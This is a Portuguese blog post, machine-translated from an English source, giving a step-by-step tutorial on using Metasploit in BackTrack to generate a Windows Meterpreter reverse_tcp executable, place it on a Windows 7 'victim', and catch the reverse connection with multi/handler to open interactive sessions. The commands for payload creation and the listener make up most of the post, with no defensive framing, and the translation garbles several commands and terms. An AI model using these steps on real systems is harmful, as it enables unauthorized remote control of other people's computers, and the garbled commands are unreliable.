![[HC]Host - No Caminho Certo Do Conhecimento!](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcsM_nM498cobNIbdrocrPK5w4mI1ynDprymBd191Rt7RVDyeml4uYJ3VPsn8TA2E0wWcKYyomsLtEotMrz-dDZ8dRf8hxC82BeuQtS_viI2rpgsVedCkLgpkkCg98gg6WmP1uw0Qhdp4/s1600/PROJETO+CERTO.png)
NOTA: "Vou ficar devendo um passo a passo melhor traduzido e exlicado pois estou sem o Backtrack em minha máquina para acompanhar o tutorial e traduzí-lo melhor. Para aumentar a imagem basta clicar sobre ela. Att, Guilherme."
O tutorial de hoje vamos aprender como criar um exploit simples (fácil de criar e de fácil implementação :-) ) E como se conectar ao Windows 7 que já vítima executada a nossa exploração simples ... simples não é?
Ok, vamos iniciar o tutorial.
Requisitos:
1. Metasploit Framework
2. Windows XP ea versão anterior do Windows (eu uso o Windows 7 SP1)
Passo a passo:
FYI neste tutorial eu uso Backtrack R2 5 com Metasploit Framework 4.2.0, e meu endereço IP é 192.168.8.91. 1. Abra o seu console, o terminal e digite o seguinte comando:
msfpayload windows / Meterpreter / reverse_tcp LHOST = 192.168.8.91 X> Desktop/
O comando acima irá criar arquivo executável do Windows com o "v4L.exe" nome e será salvo no seu desktop.
2. Agora você precisa copiar o v4L.exe recém-criado para o seu sistema Windows 7. Se você não sabe como compartilhar sua recuar 5 pasta, você pode videw o tutorial de como compartilhar pasta no seu Backtrack ( ver tutorial aqui ).
3. O próximo passo que precisamos para criar um manipulador para manipular a conexão que veio ao nosso sistema de exploração Backtrack simples já criamos antes. Abra seu console Metasploit, veja a foto e digite o seguinte comando:
Informações:
use exploit/multi/handler --> use the metasploit handler set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1) set lhost 192.168.8.91 --> set our local IP address that will catch the reverse connection exploit -j -z --> start the handler
4. Agora você pode tentar executar o exploit simples já copiar para o Windows 7 e ver se o nosso manipulador de receber algo ou não. Abaixo foi o screenshot do meu manipulador quando o Windows 7 executou o exploit simples:
Eu uso sessions -l para listar cada sessões que já abertos lá.
5. Para interagir com a sessão disponível, você pode usar sessions -i . De lá você pode fazer outro comando que você deseja.
fonte: http://vishnuvalentino.com/hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/
Traduzido com Google Translator.
0 comentários:
Postar um comentário
Proibido palavras ofensivas, racistas ou descriminatórias.
[Seu Comentário será liberado no máximo em 24horas]